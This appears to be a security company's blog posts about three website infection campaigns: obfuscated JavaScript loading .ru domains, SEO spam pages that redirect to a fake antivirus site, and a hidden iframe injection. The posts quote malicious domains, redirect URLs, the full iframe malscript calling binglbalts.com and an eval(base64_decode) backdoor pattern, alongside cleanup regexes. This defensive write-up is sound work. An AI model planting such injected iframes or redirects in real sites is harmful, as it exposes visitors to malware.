WeWatchYourWebsite

"so you don't have to!"

By

Blender type website infections

We’ve been seeing a lot of recent website infections that use highly obfuscated javascript code that decodes to a domain: yourblenderparts.ru:8080.

Many other domains are used as well such as:

  • superbblender.ru
  • thesuperpager.ru
  • superroadmap.ru
  • supersupermall.ru
  • theblendertv.ru
  • theblendertutorial.ru
  • excellentblender.ru
  • thechocolateweb.ru
  • whosaleonline.ru
  • worldmusicmagazine.ru
  • thelaceweb.ru
  • webdesktopnet.ru
  • sugaryhome.ru
  • homesaleplus.ru
  • worldmusicmagazine.ru
  • greatwebradio.ru
  • avattop.ru
  • recentmexico.ru
  • cobalttrueblue.ru
  • webnetenglish.ru
  • newusaguide.ru
  • livesitedesign.ru
  • sitemape.ru
  • samuest.ru
  • pokesack.ru
  • royalbling.ru
  • retireterrify.ru
  • thesuperexchange.ru
  • snoreflash.ru
  • royalbling.ru
  • forredtag.ru
  • newvillagefresh.ru
  • hotnewgirl.ru
  • yoursuperpool.ru
  • buytheblender.ru

The infectious code we found was at the bottom of index.php files obviously with the <script></script> tags and generally the same code was found at the bottom of various .js (javascript) files without the script tags.

In the obfuscated code there’s usually a number of strings that look like:

if (a!=” && a=’b’){a=null}

There are of course variances to this. The variable ‘a’ can be any letter or even an underscore “_” and may consist of two letters either upper or lowercase.  The variable ‘b’ can be any letter or underscore and can actually be one or two characters and may or may not be uppercase. Other than that, they’re exactly the same. :)

This format will be found in the malscript in a number of places but obviously with different variables.

The string of characters that all this code works on can be in hex format, for instance:

var I=”\x68\x74\x74\x70\x3a\x2f\x2f…” (which is actually “http://”)

or it might be something like:

var M=”hOtFtOp:O/O/…” (which, when you remove the uppercase characters is actually “http://”)

In the obfuscated malscript there is also a number of variable declarations. You’ll find things like:

  • var vM=new Array()
  • var j=new String() (sometimes with a value inside the parenthesis)
  • var Z=window
  • var K=new Date()
  • var G=new Regexp(…)
  • var QF=document

When I see a variable declaration like: var Z=window or var QF=document, I know that somewhere in the malscript I’ll see something like: z.location or QF.write. This is a common obfuscation technique of the hackers.

In all the cases we’ve worked on with this type of infection, it’s been the result of a virus that has stolen the FTP passwords from a PC with FTP access to the website.

We’ve written about this before, but here are the steps to follow to prevent this from happening again.

  1. Install a new anti-virus program. The reason is that it’s obvious that the current anti-virus software didn’t detect anything. Often times these viruses “learn” how to evade detection from the currently installed anti-virus software. Therefore, something new and different is needed to find and remove it. Many have had good results with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software).
  2. Change all FTP passwords. I recommend creating a new FTP account for everyone or for every PC that will be accessing the website. Then be sure that FTP logging is activated. This is important. If your website gets infected again, you can look in the logs to see who has the virus. If there’s a user named john and his username shows up in the logs from somewhere across the world, you can safely assume that it’s his username that’s been compromised.

That’s it. 2 steps. It’s easier to prevent your site from being infected than it is to recover from an addiction.

If you have more domains to add to this or would like to comment, please do so. You can leave a comment below or you can email direct at traef@wewatchyourwebsite.com

Until next time…

By

The recent "Movie Review" infections

Over the past week, we’ve been seeing a lot of infected websites that are ranking for various movie review web pages – and these sites have nothing to do with movies!

The typical infection is a five letter .php file such as:

  • juqip.php
  • kirqf.php
  • wxtrg.php
  • mtywo.php
  • tijox.php

And other file names. The common denominator here is the five letter file name. From what we’ve seen the file name doesn’t start with a vowel and it appears there is a different file name for each website. If you were to Google tijox.php you’ll only see it on one website.

For each of these sites, there is a folder named “./files”. The reason for the dot before the folder name is to hide it from many programs. For instance in the FTP program I use WS_FTP by Ipswitch, you have to specify that you want to see all listings that begin with a dot. By default, in WS_FTP, this folder won’t even show. The same is true for Linux. You won’t see the folder that begins with a dot.

All the files in the “./files” folder are put there by the hackers. The majority of them are movie reviews, but there’s also .html files in there about the Buffalo Sabres hockey team, various “Lord of War” files, Texas Lottery Pick 3 and various other frequently searched terms.

We have seen a lot of them using search terms that reference “lord of war”, but other search terms used are:

  • 3 10 To Yuma Soundtrack
  • death of a cheerleader wiki
  • tx lottery pick 3
  • sabres hockey
  • strike force results hershel walker
  • strike force nashville presale code
  • kesha snl
  • strangers on a train movie
  • knights templar
  • freshman fall imdb
  • dazed and confused cast
  • strangers on a train patricia highsmith
  • luci baines johnson pictures
  • bernadette protti pictures
  • dan henderson vs jake shields fight video
  • kelly pavlik news
  • the good shepherd imdb
  • acm awards 2010 voting
  • doctor who victory of the daleks download
  • dazed and confused lyrics
  • amstel gold race 2010
  • roma airport
  • farley granger imdb
  • tao las vegas
  • mastiff
  • josh selby basketball
  • king mo vs mark kerr
  • pavlik vs martinez undercard
  • american bulldog
  • kelly pavlik vs miguel espino
  • kelly pavlik wiki
  • sergio martinez next fight
  • joe mather girlfriend
  • batman and robin comic
  • bernadette protti
  • guillain barre syndrome wikipedia
  • shake weight reviews does it work
  • strikeforce results january 30
  • the hitcher movie
  • psn code generator
  • amanda peterson photos
  • elearning
  • tea leoni
  • patrick dempsey
  • unemployment
  • and many, many others

However, the real interesting information is in the query string. The query string has the “?” after the .php file name, and then it uses a variety of identifiers. Sometimes it’s a single letter other times we’ve seen words like;

  • sell
  • in
  • post
  • off
  • do
  • topic
  • page
  • pageid
  • go

these are followed by the search term. In the search term the spaces are converted to %20 possibly to further try and obfuscate their work.

We found that the majority of sites with this infection have already been found by Google and labeled, “this site may harm your computer”. Unfortunately not all of them have been flagged yet. I say unfortunately, because it seems as though that’s the way most website owners or webmasters find out that a website has been infected – by Google flagging it and sending an email to the email addresses listed in the Google Webmaster Tools.

If you were to Google, “the hitcher movie”, many listings appear that have the warning this site may harm your computer. Some don’t. Anyone looking to find information about “the hitcher movie” might click on one of the sites that hasn’t been labeled by Google yet and here’s what would happen.

First, inside the “./files” folder, there is typically a file named “b.log”. This file contains the website that these files redirect to when clicked on only from a Google Search Results Page (SERP).

For instance in one investigation the b.log file looked like this:

kqx7ea.xorg.pl|1271657010

Anyone clicking on a Google SERP for this particular website would be directed to:

http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN http://kdsproductions.com/ekctj.php?p=the%20hitcher%20movie

Which then redirects to:

http://www4.nomikals2.com/?p=p52dcWltbV%2FRlsijZFaZp29e2KHObWOXk5ecmmFoZG6a http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN

Which redirects to:

http://www2.scanprotection34p.net

Which wants to install a fake (rogue) anti-virus program on your PC.

What to look for

Look in your root folder for your website. It might be public_html or just html. Look for any .php files that have five letters that look totally random. From what we can tell, they are totally random. Then make sure that your FTP software is showing hidden files and folders. Look for a folder named “files” and see if there aren’t a whole lot of .html files in there that you’re quite certain, you didn’t put there.

What to do

If you do find these instances on any of your websites, remove the ./files folder and the five letter randomly named .php file. There may also be .php files installed in your images folders. Search all files for the string:

eval(base64_decode( followed by a long list of characters. Don’t just delete this file, but examine it. If you need help decoding it, please email at: traef@wewatchyourwebsite.com

In all our cases, we’ve found that the culprit was a virus on a PC with FTP access to the infected website. We’ve seen the FTP logs and we’ve identified the IP addresses that some of these files came from.

As with many website infections, the first step is change all FTP passwords and do not save them on any PC – yet.

Then obviously remove all the files identified above.

Next, install a different anti-virus program on your PC. The reason is that these viruses and trojans know how to evade detection of the anti-virus program that’s already been installed when the virus first infected the PC. In order to find and remove the viruses you have to install a different anti-virus program.

Many have had good success with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software). If you’re already using one of these, then try one of the other two – it has to be different.

Once you’ve found and removed the virus or trojan, you can then use your FTP program with the new passwords and feel safe.

The last thing to do is to Request a Review from your Google Webmaster Tools – if your site has tagged with the warning this site may harm your computer.

All of our clients prevented this warning by our monitoring service. While we couldn’t prevent their PCs from getting infected, we could detect when their websites changed. We immediately removed the files and alerted them to take the above steps to clean their PCs. Their websites were never blacklisted by Google because of our automated cleaning process.

If you’d like to be protected, please send me an email: traef@wewatchyourwebsite.som

If you have any comments, please feel free to register and let me know your thoughts or experience with this type of infection.

By

Attack of the binglbalts

We started seeing a lot of websites infected with a malscript that looks like:

iframe frameborder="0" onload=' if (!this.src) { this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0; } '>/iframe

In Joomla sites we’ve found it in /templates/index.php toward the bottom. In WordPress blog sites, we’ve seen it in the footer.php file.

We’ve usually been finding them toward the bottom of webpages. As of this writing the binglbalts.com domain is still active.

It turn out the result of these infections has been stolen FTP credentials. We’ve been able to view the logs of numerous sites that have been hacked by binglbalts.com and we can see the IP addresses of where the infection is coming from.

To clean this, first change all FTP passwords.

Second, you’ll have to download your entire site onto your PC or Mac. Then use grepWin and use this as the search string:

iframe/s*frameborder=\"0\" onload=\' if \(\!this\.src\)/s*\{/s*this\.src=\"http:\/\/binglbalts\.com\/grep\/\"; this\.height=0; this\.width=0;/s*\} \'><\/iframe

For the replacement string in the field "Replace with:", leave that field blank. Then set the following:

Search case-sensitive: unchecked
Dot matches newline: check
Create backup files: check
Treat files as UTF8: uncheck

Include system items: check
Include hidden items: check
Include subfolders: check

First hit the Search button. Just to see the files in the Search results window. Then hit Replace. This will find and remove the malscript and create a backup of the original file with the malscript.

This will find it all files with that string in there and remove them.

Then copy the cleaned files to your website.

In a few instances, we've been seeing some .php backdoors associated with binglbalt.com infections. These are usual backdoors we see with this code in them:

eval(base64_decode(...

To be sure you don't have that in any of your files use grepWin and this search string:

<\?php/s*eval\(base64_decode\([\'|\"].*?[\'|\"]\)\); \?>

Examine any files that show up in your Search results window for grepWin. If that's the only line in the file, then just delete the file from your website. If that's not the only line in your webpage, then use grepWin to Replace that string with nothing and you should be clean. Often times we've found this string in gifimg.php or mailcheck.php.

If you have any questions or comments, please feel free to post them. Or you can send me an email at: traef@wewatchyourwebsite.com